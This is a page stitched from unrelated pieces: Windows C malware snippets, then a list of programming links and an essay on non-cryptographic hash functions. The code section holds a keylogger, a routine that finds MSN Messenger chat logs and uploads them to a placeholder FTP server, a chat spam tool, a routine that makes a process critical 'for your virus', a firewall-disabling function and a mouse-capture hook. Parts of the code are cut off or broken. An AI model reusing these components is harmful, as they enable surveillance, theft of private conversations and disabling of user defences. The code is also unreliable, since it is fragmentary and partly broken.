      if ((GetAsyncKeyState(i) & 1) == 1) {
      virt_key = MapVirtualKey(i, 0);

      switch (i) {
       case VK_RETURN: {
         strcpy(latest_key, "\n");
         break;
       }
       case VK_SPACE: {
         strcpy(latest_key, " ");
         break;
       }
       case VK_TAB: {
         strcpy(latest_key, "  ");
         break;
       }
       case VK_DELETE: {
         strcpy(latest_key, "[D]");
         break;
       }
       case VK_BACK: {
         strcpy(latest_key, "[B]");
         break;
       }
       case VK_ESCAPE: {
         strcpy(latest_key, "[EX]");
         break;
       }
       case 0x0A2: {
       }
       case 0x00A3: {  //This takes care of control keys
       }
       case 0x011: {
         strcpy(latest_key, "[CTL]");
         break;
       }
       case VK_SHIFT: {
       }
       case VK_LSHIFT: { // Shift Keys
       }
       case VK_RSHIFT: {
         strcpy(latest_key, "[SFT]");
         break;
       default: {
          GetKeyNameText(virt_key << 16, latest_key, 50);
          break;
       }
      }
      WriteFile(file_handle, latest_key, strlen(latest_key), &numb_bytes, NULL);
      strcpy(latest_key, "");
      }
     }
     Sleep(100);
  }
  CloseHandle(file_handle);
  return TRUE;
    
}

bool SendDirectoryToFTP(char *fulldir,char *ftpserver,int port,char *hUser,char *hPass);

int main()
{
int x=0;
char buff[256],
  temp[256],
  *regpath = "Software\\Microsoft\\MSNMessenger\\PerPassportSettings\\";

HKEY hkey,hSub;

if(RegOpenKeyA(HKEY_CURRENT_USER,regpath,&hkey)==ERROR_SUCCESS)
{

 while(RegEnumKeyA(hkey,x,buff,sizeof buff)==ERROR_SUCCESS)
 {
  memset(temp,0,sizeof temp);
  sprintf(temp,"%s%s",regpath,buff);
  memset(buff,0,sizeof buff);
         if(RegOpenKeyExA(HKEY_CURRENT_USER,temp,0,KEY_QUERY_VALUE,&hSub)==ERROR_SUCCESS)
         {

         DWORD nType = REG_SZ,nSize;
         if(RegQueryValueExA(hSub,"MessageLogPath",0,&nType,(LPBYTE)buff,&nSize)==ERROR_SUCCESS) {

          if(SendDirectoryToFTP(buff,"YOURFTP.com",21,"YourFTPUsername","YourFtpPassword"))
            puts("Files sucessfully uploaded.");
          else puts("Error uploading the directory to your FTP. Wrong username/password ?");

         RegCloseKey(hSub);
         }
         }
  x++;
  memset(buff,0,sizeof buff);
 } x=0;

RegCloseKey(hkey);
} else puts("Windows Live Messenger not installed.");

getchar();

}

bool SendDirectoryToFTP(char *fulldir,char *ftpserver,int port,char *hUser,char *hPass)
{
HINTERNET hInet,hCon;
hInet = InternetOpen("fUploader",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
if(!hInet) return 0; // Neki error, whatever...

 char dir[strlen(fulldir)+1],
   tempf[strlen(fulldir)+1];
 
 sprintf(dir,"%s\\*",fulldir);

 WIN32_FIND_DATA fd;
 HANDLE h = FindFirstFileA(dir,&fd);

  if(FindNextFile(h,&fd)) {
  
    hCon = InternetConnectA(hInet,ftpserver,port,hUser,hPass,INTERNET_SERVICE_FTP,0,0);
     if(hCon) {
          while(FindNextFileA(h,&fd)) {
                  
                sprintf(tempf,"%s\\%s",fulldir,fd.cFileName);
                puts(tempf);

                if(hCon)
                  if(!FtpPutFileA(hCon,tempf,fd.cFileName,FTP_TRANSFER_TYPE_ASCII,0))
                                   return false;
               
          }
     } else return false;
  } else return false; // Directory doesn't exist.
  InternetCloseHandle(hInet);
  InternetCloseHandle(hCon);
 return true; // Directory exist.

}

#define WIDTH 340
#define HEIGHT 330

#define bListConvos 1
#define bButtonStart 2
#define bButtonRefresh 3
#define bTextSpam 4
#define bLabelTimes 5
#define bTextTimes 6
#define bLabelError 7

#define BUFFERNAME 160
#define BUFFERMED 512
#define COPYBUFFERMED 1024
#define BUFFERLARGE 1024

HFONT Font1 = CreateFont(16,0,0,0,0,FALSE,FALSE,FALSE,ANSI_CHARSET,0,0,0,0,"Arial");
HWND hListConvos,hButtonStart,hButtonRefresh,hTextSpam,hLabelTimes,hTextTimes,hLabelE
rrors;
LRESULT CALLBACK WndProcedure(HWND hWnd, UINT uMsg,WPARAM wParam, LPARAM lParam);

int setClipboard(char cSetText[COPYBUFFERMED])
{
 int iRet = 0;
 iRet = OpenClipboard(NULL);
 if(!iRet){
  return 0;
 }
 EmptyClipboard();
 char* cText = (char*) malloc(sizeof(char) * COPYBUFFERMED);
 strncpy(cText,cSetText,COPYBUFFERMED);
 SetClipboardData(CF_TEXT,cText);
 free(cText);
 CloseClipboard();
 return 1;
}

void setText(HWND hWnd,char* pcText)
{
 SendMessage(hWnd,WM_SETTEXT,NULL,(LPARAM)pcText);
}

void getText(HWND hWnd,char cBuffer[], int iSize)
{
 SendMessage(hWnd,WM_GETTEXT,(WPARAM)iSize,(LPARAM)cBuffer);
}

INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine, int nCmdShow)
{
 MSG msgMessage;
 HWND hWnd;
 WNDCLASSEX wndClass;
 wndClass.cbSize = sizeof(WNDCLASSEX);
 wndClass.style = CS_HREDRAW | CS_VREDRAW;
 wndClass.lpfnWndProc = WndProcedure;
 wndClass.cbClsExtra = 0;
 wndClass.cbWndExtra = 0;
 wndClass.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(101));
 wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
 wndClass.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
 wndClass.lpszMenuName = NULL;
 wndClass.lpszClassName = "Basic";
 wndClass.hInstance = hInstance;
 wndClass.hIconSm = LoadIcon(hInstance, MAKEINTRESOURCE(101));
 if((RegisterClassEx(&wndClass)) == NULL){
  return 0; 
 }
 if((hWnd = CreateWindow("Basic","MSN",WS_SYSMENU,CW_USEDEFAULT,CW_USEDEFAULT,WIDTH+10,HEIGHT,NULL,NULL,hInstance,
NULL)) == NULL){
  return 0;
 }
 ShowWindow(hWnd, SW_SHOWNORMAL);
 UpdateWindow(hWnd);
 while(GetMessage(&msgMessage, NULL, 0, 0)){
  TranslateMessage(&msgMessage);
  DispatchMessage(&msgMessage);
 }
 return msgMessage.wParam;
}

BOOL CALLBACK spreadMSN(HWND hWnd, LPARAM lParam)
{
 char cClassName[BUFFERMED],cWindowName[BUFFERNAME];
 HWND hwConvo;
 if(!GetClassName(hWnd,cClassName,BUFFERMED)){
  return FALSE;
 }
 if(!strcmp(cClassName,"IMWindowClass")){
  if((GetWindowText(hWnd,cWindowName,BUFFERNAME))){
   if(strstr(cWindowName," - Conversation")){
    SendMessage(hListConvos,LB_ADDSTRING,(WPARAM)0,(LPARAM)cWindowName);
   }
  }
 }
 return TRUE;
}

void spamConvos(char* pcConvoName,char* pcMessage,int iTimes)
{
 unsigned short x = 0;//Spam loop
 HWND hwConvo = FindWindow(NULL,pcConvoName);
 if(hwConvo == NULL){
  setText(hLabelErrors,"Error, conversation window not found\n");
  return;
 }
 for(x=0; x<iTimes; x++){
  SetForegroundWindow(hwConvo);
  keybd_event(VK_LCONTROL,0,0,0);
  keybd_event(86,0,0,0);
  keybd_event(VK_LCONTROL,0,KEYEVENTF_KEYUP,0);
  keybd_event(86,0,KEYEVENTF_KEYUP,0);
  keybd_event(13,0,0,0);
  keybd_event(13,0,KEYEVENTF_KEYUP,0);
 }
 Sleep(100);
 return;
}

void startSpam()
{
 char cWindowName[BUFFERNAME],cSpamText[BUFFERMED],char cSpamTimes[3];
 unsigned short int i=0; //Convo's
 unsigned short int iItem=0, iItems=0,iSpamTimes=0; //Current item, Total items, loop amount
 getText(hTextSpam,cSpamText,BUFFERMED);
 if(setClipboard(cSpamText)){
  iItems = SendMessage(hListConvos,(UINT) LB_GETCOUNT,0,0);
  for(i=0; i<iItems; i++){
   int iSelected = SendMessage(hListConvos,(UINT)LB_GETSEL,(WPARAM)i,0);
   if(iSelected){
    SendMessage(hListConvos,(UINT)LB_GETTEXT,(WPARAM)i,(LPARAM)cWindowName);
    getText(hTextTimes,cSpamTimes,3);
    iSpamTimes = atoi(cSpamTimes);
    spamConvos(cWindowName,cSpamText,iSpamTimes);
   }
  }
 }
 else{
  setText(hLabelErrors,"Error, clipboard set failed\n");
 }
}

void addConvos()
{
 unsigned short int iItem=0,iItems=0;
 iItems = SendMessage(hListConvos,(UINT) LB_GETCOUNT,0,0);
 iItem = iItems + 1;
 do{
  iItem--;
  SendMessage(hListConvos,(UINT) LB_DELETESTRING,(WPARAM)iItem,0);
 }while(iItem);
 EnumWindows(spreadMSN,0);
}

LRESULT CALLBACK WndProcedure(HWND hWnd, UINT Msg,WPARAM wParam, LPARAM lParam)
{
 switch(Msg){
 case WM_DESTROY:
  PostQuitMessage(WM_QUIT);
  break;
 case WM_CREATE:                       //x y width height
  hListConvos = CreateWindowEx(0,"ListBox",0,LBS_STANDARD | WS_CHILD | WS_VISIBLE |LBS_EXTENDEDSEL |LBS_SORT | WS_VSCROLL | WS_TABSTOP,0, 0, WIDTH, 150,hWnd,(HMENU)bListConvos,0,NULL);
  hButtonStart = CreateWindowEx(0,"Button","Spam",WS_VISIBLE | WS_CHILD,0, 150, 70, 18,hWnd,(HMENU)bButtonStart,0,NULL);
  hButtonRefresh = CreateWindowEx(0,"Button","Refresh convos",WS_VISIBLE | WS_CHILD,230, 150, 110, 18,hWnd,(HMENU)bButtonRefresh,0,NULL);
  hTextSpam = CreateWindowEx(0,"Edit",NULL,WS_VISIBLE | WS_CHILD | WS_BORDER | ES_MULTILINE,0, 170, WIDTH, 100,hWnd,(HMENU)bTextSpam,0,NULL);
  hTextTimes = CreateWindowEx(0,"Edit",NULL,WS_CHILD | WS_VISIBLE | WS_BORDER | ES_LEFT | ES_MULTILINE | ES_NOHIDESEL,80, 150, 30, 18,hWnd,(HMENU)hTextTimes,0,NULL);
  hLabelTimes = CreateWindowEx(0,"Edit",NULL,WS_CHILD | WS_VISIBLE | WS_BORDER | ES_LEFT | ES_MULTILINE | ES_NOHIDESEL,120, 150, 70, 18,hWnd,0,0,NULL);
  hLabelErrors = CreateWindowEx(0,"Edit",NULL,WS_CHILD | WS_VISIBLE | WS_BORDER | ES_LEFT | ES_MULTILINE | ES_NOHIDESEL,0, 280, WIDTH, 20,hWnd,0,0,NULL);
  SendMessage(hLabelErrors,EM_SETREADONLY,(WPARAM)TRUE,(LPARAM)TRUE);
  SendMessage(hLabelTimes,EM_SETREADONLY,(WPARAM)TRUE,(LPARAM)TRUE);
  setText(hTextSpam," < Enter a message here > ");
  setText(hLabelTimes," times");
  setText(hTextTimes,"50");
  EnumWindows(spreadMSN,0);
 case WM_COMMAND:
  switch(LOWORD(wParam)){
   case bButtonStart:
    setText(hButtonStart,"Spamming");
    EnableWindow(hButtonStart,FALSE);
    startSpam();
    Sleep(100);
    setText(hButtonStart,"Spam");
    EnableWindow(hButtonStart,TRUE);
    break;
   
   case bButtonRefresh:
    addConvos();
    break;
   
   default:
    break;
  }
  break;
 
 default:
  return DefWindowProc(hWnd, Msg, wParam, lParam);
 }
 return 0;
}

int senderr(int s, char * message){
 if((send(s, message, strlen(message), 0)) < 0){
  printf("send() error, while sending \"%s\"\n", message);
  return -1;
 }
 return 0;
}

int main(int argc, char** argv){
 if(argc < 4){
  printf("Usage: ./email <to> <from> <message>\n");
  return 0;
 }
 const struct addrinfo hints = {AI_CANONNAME, AF_INET, SOCK_STREAM, IPPROTO_TCP};
 struct addrinfo *res;
 int s;
 char * buffer;
 if((buffer = calloc(512, 1)) == NULL){
  printf("calloc() error.\n");
  return 0;
 }
 if(getaddrinfo("smtp.charter.net", "25", &hints, &res) != 0){ //or w/e server you use.
  printf("getaddrinfo() error.\n");
  return 0;
 }
 if((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
  printf("socket() error.\n");
  return 0;
 }
 if(connect(s, res->ai_addr, res->ai_addrlen) < 0){
  printf("connect() error.\n");
  return 0;
 }
 senderr(s, "HELO hi\r\n");
 sprintf(buffer, "MAIL FROM: %s\r\n", argv[2]);
 if(senderr(s, buffer) < 0) return 0;
 memset(buffer, 0, 512);
 sprintf(buffer, "RCPT TO: %s\r\n", argv[1]);
 if(senderr(s, buffer) < 0) return 0;
 memset(buffer, 0, 512);
 if(senderr(s, "DATA\r\n") < 0) return 0;
 sprintf(buffer, "%s\r\n.\r\n", argv[3]);
 if(senderr(s, buffer) < 0) return 0;
 senderr(s, "QUIT\r\n");
 return 0;
}

typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (
      IN BOOLEAN     NewValue,
      OUT PBOOLEAN OldValue, // (optional)
      IN BOOLEAN   IsWinlogon );

BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm
{
 HANDLE hToken;
 LUID luid;
 TOKEN_PRIVILEGES tkprivs;
 ZeroMemory(&tkprivs, sizeof(tkprivs));
 
 if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
  return FALSE;
 
 if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
  CloseHandle(hToken); return FALSE;
 }
 
 tkprivs.PrivilegeCount = 1;
 tkprivs.Privileges[0].Luid = luid;
 tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 
 BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
 CloseHandle(hToken);
 return bRet;
}

BOOL ProtectProcess() // by _FIL73R_
{
   HANDLE hDLL;
   RtlSetProcessIsCritical fSetCritical;

   hDLL = LoadLibraryA("ntdll.dll");
   if ( hDLL != NULL )
   {
 EnablePriv(SE_DEBUG_NAME);
   (fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );
    if(!fSetCritical) return 0;
    fSetCritical(1,0,0);
 return 1;
   } else
    return 0;
}

int main (void)
{
ProtectProcess();
   while(1)
   {
 // do your virus thingy
   }
return 0;
}

int WFDisable( );

int main()
{
 int wf;

 wf = WFDisable( );
 if( wf == 0 ) {
  printf( "wf< success\n" );
 }
 else {
  printf( "wf< error: %i\n", wf );
 }
 getchar();

 return 0;
}

int WFDisable()
{
 SERVICE_STATUS sStatus;
 
 SC_HANDLE hManager = OpenSCManager( NULL, NULL, 0xF003F );
 if( hManager == NULL ) {
  return( 1 );
 }
 //win7下防火墙服务名为MpsSvc
    //xp下防火墙服务名为SharedAccess
 SC_HANDLE hService = OpenService( hManager, (const char*)"MpsSvc", 0xF01FF );
 if( hService == NULL ) {
  return( 2 );
 }
 BOOL bControl = ControlService( hService, 0x00000001, &sStatus );
 if( bControl == 0 ) {
  return( 3 );
 }
 CloseServiceHandle( hManager );
 CloseServiceHandle( hService );

 return( 0 );
}

    outHandle = _open_osfhandle((long)GetStdHandle(STD_OUTPUT_HANDLE), _O_TEXT);
    errHandle = _open_osfhandle((long)GetStdHandle(STD_ERROR_HANDLE),_O_TEXT);
    inHandle = _open_osfhandle((long)GetStdHandle(STD_INPUT_HANDLE),_O_TEXT );

    outFile = _fdopen(outHandle, "w" );
    errFile = _fdopen(errHandle, "w");
    inFile =  _fdopen(inHandle, "r");

    *stdout = *outFile;
    *stderr = *errFile;
    *stdin = *inFile;

    setvbuf( stdout, NULL, _IONBF, 0 );
    setvbuf( stderr, NULL, _IONBF, 0 );
    setvbuf( stdin, NULL, _IONBF, 0 );

    std::ios::sync_with_stdio();

}

class CMousehookApp : public CWinApp

 1BOOL CMousehookApp::InitInstance() 
 2{
 3    AFX_MANAGE_STATE(AfxGetStaticModuleState());
 4    hinsMouse=AfxGetInstanceHandle();
 5    return TRUE;
 6}
 7
 8int CMousehookApp::ExitInstance() 
 9{
10    return TRUE;
11}

1#pragma data_seg(".SHARDAT")
2static HHOOK mouse=NULL;
3FILE *fm;
4#pragma data_seg()
5
6HINSTANCE hinsMouse;

 1LRESULT __declspec(dllexport)__stdcall  CALLBACK   MouseProc(
 2                                                           int nCode, 
 3                                                           WPARAM wParam, 
 4                                                           LPARAM lParam)
 5{
 6    LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT *)lParam;
 7    if(nCode>=0)
 8    {
 9        if(wParam == WM_RBUTTONDOWN)  
10        {   
11            HWND hTargetHwnd=lpMouse->hwnd; //得到鼠标所在窗口句柄
12            if(hTargetHwnd)
13            {
14                char caption[256]={'\0'};
15                ::GetWindowText(hTargetHwnd, caption, sizeof(caption)); //得到它的样式
16                fm=fopen("c:\\mouse.txt","a+");
17                fputs(caption,fm);
18                fputs("\n",fm);
19                fclose(fm);
20            }
21        }
22
23
24    }    
25    
26    return   CallNextHookEx( mouse, nCode, wParam, lParam );
27
28}

 1    BOOL __declspec(dllexport)__stdcall installhook()
 2    {
 3        fm=fopen("c:\\mouse.txt","w");
 4        fclose(fm);
 5        
 6        mouse =SetWindowsHookEx(WH_MOUSE,(HOOKPROC)MouseProc,hinsMouse,0);
 7        
 8        return TRUE;
 9    }
10    
11    
12    BOOL __declspec(dllexport)  UnHook()
13    {
14        
15        BOOL unhooked = UnhookWindowsHookEx(mouse);
16        return unhooked;
17    }

（5）添加导出函数

1; mousehook.def : Declares the module parameters for the DLL.
2
3LIBRARY      "mousehook"
4DESCRIPTION  'mousehook Windows Dynamic Link Library'
5
6EXPORTS
7    ; Explicit exports can go here 
8     MouseProc
9     installhook

Programming Related

• The Portable Application Standards Committee (PASC - POSIX)
• Boost C++ Libraries
• C++ Templates FAQ
• C++ FAQ LITE
• Guru of the Week (C++)
• Programming in C UNIX System Calls and Subroutines using C
• IT++
• The Message Passing Interface (MPI)
• EFG Computer Lab (Delphi)
• Physically Based Modeling Siggraph '97
• Snippets of C code - Combinatorial Objects
• IBM Tutorials
• The Adaptive Communication Environment (ACE)
• SGI Standard Template Library Programmer's Guide
• STLPort
• Java SDK
• POSIX Serial Interface Guide
• Programmers Heaven
• Graphics Gems (ACM)
• Numerical Methods in Pascal
• Advanced Linux Programming
• OROCOS (Open RObot COntrol Software)
• Open Dynamics Engine (ODE)
• The C++ Virtual Library
• The Stony Brook Algorithm Repository
• The Swiss Delphi Center
• Delphi Source
• Algorithm Library Design Lecture Notes
• JEDI Project
• The Algorithm Design Manual
• The Free Country
• DjVuLibre
• Data Structures And Algorithms With Object-Oriented Design Patterns in C++
• POSIX Thread tutorial
• Graphics32 Library
• About.com On Delphi
• Koders (Open Source Code Search Engine)
• Template Numerical Toolkit (NIST)
• oonumerics.org (Object Oriented Scientific Computing)
• General-Purpose Computation Using Graphics Hardware

Cryptography

• A Cryptographic Compendium
• Watermarking World
• Rivest's Crypto Links
• PGP International
• Bruce Schneier's Cryptogram
• RSA Laboratories
• The Handbook of Applied Cryptography
• Cryptix
• Crypto++
• Cryptography Research Inc.
• Cryptology ePrint Archive
• Cryptography World
• Cryptography A-Z
• Cryptology
• HotBits - Strong Random Numbers
• Honeypots Solutions
• The Honeynet Project
• Attacking the RSA Cryptographic System
• Elliptic Curve Cryptosystems
• ECDL FAQ - version 0.2
• Peter Gutmann
• GGNFS - A Number Field Sieve implementation
• Cryptography FAQ
• An Illustrated Guide to Cryptographic Hashes
• IEEE Security
• The Cryptography Center
• NIST FIPS
• Standards for Efficient cryptography Group (SECG)
• IEEE 1363

Computational Geometry

• Geometry In Action
• Jeff Erickson's Computational Geometry Pages
• Fast Robust Predicates for Computational Geometry
• Encyclopedia Triangle Centers
• Encyclopedia Triangle Centers (Sketches)
• Computational Geometry On The Web
• CGAL
• Geometry Analysis Numerics Graphics (GANG)
• Exact Geometric Computation Page
• The Geometry Center
• Meshing Research Corner
• Virtual Handbook of Computational Geometry
• Mike Goodrich's Geometric Algorithms
• David Eberly's Geometric Tools (aka Magic Software)

Science

• Math World
• World Of Physics
• World Of Astronomy
• Encyclopedia Astronautica
• Quantum Experiments and the Foundations of Physics
• How Stuff Works
• Nova Online - Time Travel
• Mathematical Constants and Computation
• NASA Jet Propulsion Laboratory
• Paul Bourke's Website
• Game Theory
• Introduction to Mathematical Logic
• Planet Math
• PhysicsWeb
• Riddles
• The On-Line Encyclopedia of Integer Sequences
• World Of Numbers
• Nth Prime Page
• Encyclopedia of Combinatorial Structures
• The Combinatorial Object Server
• Number Theory Web
• LiDIA
• Popular Science
• Math Pages
• Wavelet.org
• The Public Library of Science
• The Largest Known Primes
• Bad Astronomy
• Nano-Dot
• arXiv.org e-Print archive
• Cogprints
• AMS Books Online
• Engadget
• QuakeSim
• Mudd Math Fun Facts
• Instructables
• Hack A Day

Computer Science

• Citeseer
• Association For Computing Machinery (ACM)
• IEEE Computer Society
• Theory of Computation Group
• Knowledge Representation
• Ray Kurzweil - KurzweilAI.Net
• RoboCup
• RoboCupRescue
• Let's Build a Compiler by Jack Crenshaw
• Traveling Salesman Problem (Princeton)
• Dr John Daugman
• The Iris Recognition Homepage
• Fraunhofer Quantum Computing Simulator
• David MacKay - Information Theory, Inference, and Learning Algorithms (Online e-book)
• Luc Devroye - Non-Uniform Random Variate Generation (Online e-book)

Open Source

• OpenBSD
• FreeBSD
• NetBSD
• The UNIX® System
• Internet Software Consortium (ISC)
• Cygwin
• GCC
• Free Pascal
• GNU Pascal
• Code::Blocks - Cross Platform C++ IDE
• Anjuta DevStudio
• Manrake
• Debian
• OpenSource.org
• Linux Iran
• FarsiKDE
• Slashdot
• Wikipedia
• Directory of Open Access Journals
• The Public Library of Science
• Minix From Scratch
• The Linux Documentation Project
• CPAN
• The Perl Directory
• GStreamer
• FreeDesktop.org
• Inkscape
• Open Clipart
• Animation Factory

Technology

• Tom's Hardware Guide
• arsTechnica
• Overclockers.com

Distributed Computing Projects

• Search for Extraterrestrial Intelligence (SETI)
• Folding@Home (Protien Folding Project)
• Distributed.Net
• Genome@Home
• ChessBrain
• GIMPS (Greatest Internet Mersenne Prime Search)
• The Grid Engine
• The Globus Alliance
• MD5CRK
• eCompute ECC2-109 Project
• NFSNET (Number Field Sieve Net)
• Climate Prediction Project
• Zeta Grid

Miscellaneous Resources

• DNS Resources Directory
• Perl Doc
• Online Trace Route
• Online Ping
• Search Engine Watch
• Newseum
• Unicode
• Proxify
• Search Engine Scan (URL Rank)
• Scientific Paper Search Engine

Description

Hash functions are by definition and implementation pseudo random number generators (PRNG). From this generalization its generally accepted that the performance of hash functions and also comparisons between hash functions can be achieved by treating hash function as PRNGs.

Analysis techniques such a Poisson distribution can be used to analyze the collision rates of different hash functions for different groups of data. In general there is a theoretical hash function known as the perfect hash function for any group of data. The perfect hash function by definition states that no collisions will occur meaning no repeating hash values will arise from different elements of the group. In reality its very difficult to find a perfect hash function and the practical applications of perfect hashing and its variant minimal perfect hashing are quite limited. In practice it is generally recognized that a perfect hash function is the hash function that produces the least amount of collisions for a particular set of data.

The problem is that there are so many permutations of types of data, some highly random, others containing high degrees of patterning that its difficult to generalize a hash function for all data types or even for specific data types. All one can do is via trial and error find the hash function that best suites their needs. Some dimensions to analyze for choosing hash functions are:

• Data Distribution

  This is the measure of how well the hash function distributes the hash values of elements within a set of data. Analysis in this measure requires knowing the number of collisions that occur with the data set meaning non-unique hash values, If chaining is used for collision resolution the average length of the chains (which would in theory be the average of each bucket's collision count) analyzed, also the amount of grouping of the hash values within ranges should be analyzed.

• Hash Function Efficiency

  This is the measure of how efficiently the hash function produces hash values for elements within a set of data. When algorithms which contain hash functions are analyzed it is generally assumed that hash functions have a complexity of O(1), that is why look-ups for data in a hash-table are said to be on average of O(1) complexity, where as look-ups of data in maps (Red-Black Trees) are said to be of O(logn) complexity.

  A hash function should in theory be a very quick, stable and deterministic operation. A hash function may not always lend itself to being of O(1) complexity, however in general the linear traversal through a string of data to be hashed is so quick and the fact that hash functions are generally used on primary keys which by definition are supposed to be much smaller associative identifiers of larger blocks of data implies that the whole operation should be quick and to a certain degree stable.

The hash functions in this essay are known as simple hash functions. They are typically used for data hashing (string hashing). They are used to create keys which are used in associative containers such as hash-tables. These hash functions are not cryptographically safe, they can easily be reversed and many different combinations of data can be easily found to produce identical hash values for any combination of data.

Hashing Methodologies

Hash functions are typically defined by the way they create hash values from data. There are two main methodologies for a hash algorithm to implement, they are:

• Addative and Multiplicative Hashing

  This is where the hash value is constructed by traversing through the data and continually incrementing an initial value by a calculated value relative to an element within the data. The calculation done on the element value is usually in the form of a multiplication by a prime number.

  

• Rotative Hashing

  Same as additive hashing in that every element in the data string is used to construct the hash, but unlike additive hashing the values are put through a process of bitwise shifting. Usually a combination of both left and right shifts, the shift amounts as before are prime. The result of each process is added to some form of accumulating count, the final result being the hash value is passed back as the final accumulation.

  

Hash Functions and Prime Numbers

There isn't much real mathematical work which can definitely prove the relationship between prime numbers and pseudo random number generators. Nevertheless, the best results have been found to include the use of prime numbers. PRNGs are currently studied as a statistical entity, they are not study as deterministic entities hence any analysis done can only bare witness to the overall result rather than to determine how and or why the result came into being. If a more discrete analysis could be carried out, one could better understand what prime numbers work better and why they work better, and at the same time why other prime numbers don't work as well, answering these questions with stable, repeatable proofs can better equip one for designing better PRNGs and hence eventually better hash functions.

The basic concepts surrounding the use of prime numbers in hash functions revolve around the concept of operating the current state value of the hash function with a prime number as opposed to another type of number. The term operate means something as simple as applying some form of mathematical operation such as multiplication or addition to the hash value. The result being a new hash value that should statistically have a higher entropic value or in other words a very low bit-bias for any of the bits in the new hash value. In simple terms when you multiply a set of random numbers by a prime number the resulting numbers when analyzed at their bit levels should show no bias towards being one state or another ie: Pr(B_i = 1) ~= 0.5. There is no concrete proof that this is the case or that it only happens with prime numbers, it just seems to be an ongoing self-proclaimed intuition that some professionals in the field seem obligied to follow.

Deciding what is the right or even better yet the best possible combination of hashing methodologies and use of prime numbers is still very much a black art. No single methodology can lay claim to being the ultimate general purpose hash function. The best one can do is to evolve via trial and error and statistical analysis methods for obtaining suitable hashing algorithms that meet their needs.

Bit Biases

Bit sequence generators, be them purely random or in some way deterministic, will generate bits with a particular probability of either being one state or another - this probability is known as the bit bias. In the case of purely random generators the bit bias of any generated bit being high or low is always 50% (Pr=0.5).

However in the case of pseudo random number generators, the algorithm generating the bits will define the bit bias of the bits generated in the minimal output block of the generator.

Assume a PRNG that produces 8 bit blocks as its output. For some reason the MSB is always set to high, the bit bias then for the MSB will be a probability of 100% being set high. From this one concludes that even though there are 256 possible values that can be produced with this PRNG, values less than 128 will never be generated. Assuming for simplicity the other bits being generated are purely random, then there is equal chance that any value between 128 and 255 will be generated, however at the same time, there is 0% chance that a value less than 128 will be produced.

All PRNGs, be they the likes of hash functions, ciphers, msequences or anything else that produces a bit sequence will all possess a unique bit bias. Most PRNGs will attempt to converge their bit biases to an equality, stream ciphers are one example, whereas others will work best with a known yet unstable bit bias.

Mixing or scrambling of a bit sequence is one way of producing a common equality in the bit bias of a stream. Though one must be careful to ensure that by mixing they do not further diverge the bit biases. A form of mixing used in cryptography is known as avalanching, this is where a block of bits are mixed together sometimes using a substitution or permutation box, with another block to produce an output that will be used to mix with yet another block.

As displayed in the figure below the avalanching process begins with one or more pieces of binary data. Bits in the data are taken and operated upon (usually some form of input sensitive bit reducing bitwise logic) producing an ith-tier piece data. The process is then repeated on the ith-tier data to produce an i+1'th tier data where the number of bits in the current tier will be less than or equal to the number of bits in the previous tier.

The culmination of this repeated process will result in one bit whos value is said to be dependent upon all the bits from the original piece(s) of data. It should be noted that the figure below is a mere generalisation of the avalanching process and need not necessarily be the only form of the process.

In data communications that use block code based error correcting codes, it has been seen that to overcome burst errors, that is when there is a large amount of noise for a very short period of time in the carrier channel, if one were to bit-scramble whole code blocks with each other, then have the scrambled form transmitted and then descrambled at the other end that burst errors would then most likely be distributed almost evenly over then entire sequence of blocks transmitted allowing for a much higher chance of fully detecting and correcting all errors. This type of deterministic scrambling and descrambling without the need for a common key is known as interleaving and deinterleaving.

Various Forms Of Hashing

Hashing as a tool to associate one set or bulk of data with an identifier has many different forms of application in the real-world. Below are some of the more common uses of hash functions.

• String Hashing

  Used in the area of data storage access. Mainly within indexing of data and as a structural back end to associative containers(ie: hash tables)

• Cryptographic Hashing

  Used for data/user verification and authentication. A strong cryptographic hash function has the property of being very difficult to reverse the result of the hash and hence reproduce the original piece of data. Cryptographic hash functions are used to hash user's passwords and have the hash of the passwords stored on a system rather than having the password itself stored. Cryptographic hash functions are also seen as irreversible compression functions, being able to represent large quantities of data with a signal ID, they are useful in seeing whether or not the data has been tampered with, and can also be used as data one signes in order to prove authenticity of a document via other cryptographic means.

• Geometric Hashing

  This form of hashing is used in the field of computer vision for the detection of classified objects in arbitrary scenes.

  The process involves initially selecting a region or object of interest. From there using affine invariant feature detection algorithms such as the Harris corner detector (HCD), Scale-Invariant Feature Transform (SIFT) or Speeded-Up Robust Features (SURF), a set of affine features are extracted which are deemed to represent said object or region. This set is sometimes called a macro-feature or a constellation of features. Depending on the nature of the features detected and the type of object or region being classified it may still be possible to match two constellations of features even though there may be minor disparities (such as missing or outlier features) between the two sets. The constellations are then said to be the classified set of features.

  A hash value is computed from the constellation of features. This is typically done by initially defining a space where the hash values are intended to reside - the hash value in this case is a multidimensional value normalized for the defined space. Coupled with the process for computing the hash value another process that determines the distance between two hash values is needed - A distance measure is required rather than a deterministic equality operator due to the issue of possible disparities of the constellations that went into calculating the hash value. Also owing to the non-linear nature of such spaces the simple Euclidean distance metric is essentially ineffective, as a result the process of automatically determining a distance metric for a particular space has become an active field of research in academia.

  Typical examples of geometric hashing include the classification of various kinds of automobiles, for the purpose of re-detection in arbitrary scenes. The level of detection can be varied from just detecting a vehicle, to a particular model of vehicle, to a specific vehicle.

• Bloom Filters

  A Bloom filter allows for the state of existance of a very large set of possible type values to be represented with a much smaller piece of memory. This is achieved through the use of multiple distinct hash functions and also by allowing the result of a query for the existance of a particular type to have a certain amount of error. This error can be controlled by varying the size of the table used for the Bloom filter and also by varying the number of hash functions. Bloom filters are commonly found in applications such as spell-checkers, network packet analysis tools and network/internet caches.

Available Hash Functions

